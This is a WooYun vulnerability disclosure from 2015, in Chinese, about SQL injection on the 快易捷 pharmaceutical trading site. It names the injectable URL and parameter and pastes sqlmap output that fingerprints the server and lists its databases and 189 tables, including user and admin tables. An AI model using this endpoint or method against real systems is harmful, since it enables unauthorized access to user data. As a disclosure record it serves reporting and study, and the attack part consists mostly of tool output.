漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0145813
漏洞标题:快易捷SQL注入漏洞(涉及25w用户信息)
相关厂商:快易捷
漏洞作者: 偶然
提交时间:2015-10-10 16:40
修复时间:2015-11-24 16:42
公开时间:2015-11-24 16:42
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
作为国内最专业、最大的药品交易网站,其拥有庞大的医学专业用户群,包括制药厂、医药公司、医院、诊所和药房在内的20万家注册会员,惠及近3000万户家庭,网络业务已覆盖全国所有省份,发布医药信息达4000万条,服务近亿人,已在中国形成独特的医药电子商务优势。
详细说明:
http://www.yp900.com/Admin_Buy/getAdInfo.ashx?areaid=8&classid=23&random= classid存在注入
[16:01:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[16:01:31] [INFO] fetching database names
available databases [7]:
[*] db_hzt
[*] db_lady
[*] db_tuiguang
[*] master
[*] model
[*] msdb
[*] tempdb
漏洞证明:
Database: db_hzt
[189 tables]
+---------------------------------+
| ActivitySmsLog |
| Direct |
| DirectImage |
| DirectMediNameLink |
| HTZ_Admin |
| HTZ_Admin_Column |
| HTZ_LinkType_admin |
| HTZ_ad_zsindex |
| HTZ_advertisement_admin |
| HTZ_friendLink_admin |
| HZT_AdLocation_admin |
| HZT_AdLocation_zsindex |
| HZT_Buy_info |
| HZT_Medicine_Class |
| HZT_NewsInfo_admin |
| HZT_OrderState_admin |
| HZT_Supply_info |
| HZT_agent_info |
| HZT_filterword_admin |
| HZT_infotype_admin |
| HZT_linkkind_admin |
| HZT_medicine_groupbuy_admin |
| HZT_medicine_groupsupply_admin |
| HZT_productorder_admin |
| Investment_info |
| MT_EXPO |
| MT_Price |
| MT_QQ |
| MT_VIPProduct |
| T_AREA |
| V_Product |
| V_Tran |
| V_transaction |
| bak_htz_admin_20140710 |
| bak_medicine_user_info_20140710 |
| company |
| company_info |
| corp |
| coupon_buy |
| coupon_cut |
| coupon_sell |
| coupon_send |
| couponuse_info |
| directlack |
| employeework_info |
| express_info |
| freight_province |
| freight_template |
| huayuan_pzwh1 |
| hzt_ad_area |
| hzt_ad_class |
| hzt_ad_info |
| hzt_ad_input |
| hzt_ad_list |
| hzt_anhuitoubiao |
| hzt_anhuizhongbiao |
| hzt_areauserid |
| hzt_cjbfz |
| hzt_commentcontent |
| hzt_cus_remark |
| hzt_customer_relations |
| hzt_cuxiaoproduct |
| hzt_dali |
| hzt_data |
| hzt_dijiaproduct |
| hzt_drug |
| hzt_drug_advice |
| hzt_drug_news |
| hzt_drug_type |
| hzt_drugtype |
| hzt_grouppow_admin |
| hzt_groupuser_admin |
| hzt_guestaddress |
| hzt_guestbook |
| hzt_guestshop |
| hzt_guestshop_order |
| hzt_hotpro_product |
| hzt_hotproduct |
| hzt_hotproductkind |
| hzt_huayuanuserid |
| hzt_huodongbaoming |
| hzt_jbbw |
| hzt_login |
| hzt_medicine_page_view |
| hzt_news |
| hzt_newscomment_admin |
| hzt_order_log |
| hzt_ordercompany |
| hzt_orderdetail_admin |
| hzt_passnumbertype |
| hzt_picture_news |
| hzt_picture_news_type |
| hzt_pictures |
| hzt_procure_info |
| hzt_product |
| hzt_product_leavemsg_admin |
| hzt_product_subject |
| hzt_productcomment_admin |
| hzt_productkeyword |
| hzt_productorder |
| hzt_productorder_bukuan |
| hzt_producttugou |
| hzt_producttype |
| hzt_provide_info |
| hzt_publishcompany |
| hzt_publishtype |
| hzt_qiugou |
| hzt_qiugou_order |
| hzt_remaiproduct |
| hzt_research |
| hzt_search_keywords |
| hzt_sellerbook |
| hzt_sendmsg |
| hzt_sendtousermsg |
| hzt_shop_page_view |
| hzt_subject |
| hzt_subject_buy |
| hzt_subject_news |
| hzt_subject_type |
| hzt_subjectnews |
| hzt_subjectproduct |
| hzt_subjecttype |
| hzt_supply_leavemsg |
| hzt_user_grade |
| hzt_user_menu |
| hzt_user_province |
| hzt_user_rights |
| hzt_user_zffs |
| hzt_wenda_comment |
| hzt_wenda_news |
| hzt_wenda_type |
| hzt_xml |
| hzt_yangguanghuiyuan |
| hzt_yibaoproduct |
| hzt_yijianfankui |
| hzt_yixueziliao |
| hzt_ypbw |
| hzt_zhangshang_remark |
| hzt_zhaoshangkehu |
| hzt_zhengjian_buy |
| hzt_zhongbiao |
| hzt_zhongbiaocopy |
| hzt_zhuantinews |
| hzt_zhuantitype |
| hzt_zjgm_buy |
| integral_exchange |
| integral_info |
| medicine_blacklist |
| medicine_info |
| medicine_regions_price |
| medicine_stardard |
| medicine_user_info |
| medicine_user_info_del |
| medicinetype_info |
| mediname |
| message |
| prod |
| promotion_apply |
| promotion_class |
| promotion_info |
| promotion_recommend |
| refresh_info |
| sqlmapoutput |
| sysdiagrams |
| system_state |
| tqb_hzt_drug |
| tqb_hzt_drug_type |
| trees |
| user_address |
| user_certificate_info |
| user_check |
| user_domain |
| user_info |
| user_info_log |
| user_marks |
| user_shop_ad |
| user_shop_msg |
| user_shop_set |
| usertype_info |
| viewhistory |
| yiyaogongsi |
| zf_trees |
| zhaobiao2002 |
| zhaobiao2004 |
| zhaobiao2005 |
| zhaobiao2006 |
| zhaobiao2007 |
| zhaobiao2008 |
| zhongyao |
+---------------------------------+
修复方案:
版权声明:转载请注明来源 偶然@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)